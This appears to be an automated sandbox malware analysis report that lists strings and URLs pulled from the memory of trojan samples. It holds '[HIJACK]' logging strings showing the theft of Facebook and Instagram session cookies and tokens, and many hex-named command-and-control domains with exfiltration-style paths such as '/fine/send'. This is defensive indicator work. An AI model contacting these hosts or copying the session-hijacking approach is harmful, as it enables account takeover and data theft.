Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 9ed2feea30c3cc5d.com

Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/o/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/o/H
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.350643172.0000000000800000.00000004.00000001.sdmp	String found in binary or memory: http://55b53b5a4bc1ab86.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://55be681fc6760236.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349674594.0000000000800000.00000004.00000001.sdmp	String found in binary or memory: http://55bk19e64ea00d6ecfe1.io/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/1
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.421765366.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/info_old/ddd
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/ll
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368374253.0000000000800000.00000004.00000020.sdmp	String found in binary or memory: http://61d347c728b2d94d.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://61d53b5a4bc1ab86.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/ll
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/o/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.357948935.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://84b2feea30c3cc5d.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://84b5a35d6e5335ef.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://84b5a35d6e5335ef.com/info_old/w
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.421266635.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.421266635.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/info_old/ddd9
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.350035754.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://9ed2feea30c3cc5d.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	String found in binary or memory: http://9ed2feea30c3cc5d.com//fine/send
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.350410684.00000000007F2000.00000004.00000001.sdmp	String found in binary or memory: http://9ede681fc6760236.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.381165044.00000000007A7000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/_1;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422415280.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422415280.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/info_old/dddn
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/info_old/w
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/o/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com//
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com//L
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/info_old/ddd
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/ll
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/p
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/6
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.381165044.00000000007A7000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/7
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/C
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/Y
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349697367.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/h
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422586817.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422586817.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/ddd.
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383749465.0000000000779000.00000004.00000020.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/wJ
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.381285815.00000000007A3000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/y
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://bdc347c728b2d94d.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://bdc347c728b2d94d.com/l
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	String found in binary or memory: http://c431a802ff4a46b5.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348638728.00000000007DA000.00000004.00000001.sdmp	String found in binary or memory: http://c431a802ff4a46b5.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368374253.0000000000800000.00000004.00000020.sdmp	String found in binary or memory: http://c43k19e64ea00d6ecfe1.io/
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349991546.0000000000807000.00000004.00000001.sdmp	String found in binary or memory: http://charlesproxy.com/ssl
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379540838.0000000003E9D000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx?
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1618257864703.exe.6.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1618257864703.exe.6.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1618257864703.exe.6.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://docs.google.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: http://docs.google.com/7
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divx
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://drive.google.com/
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://google.com/chrome
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjIwZTg0ZTY4NTUwZTU4OGJhMzFmNmI5YjE4N2E4NDAyZWVmO
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N
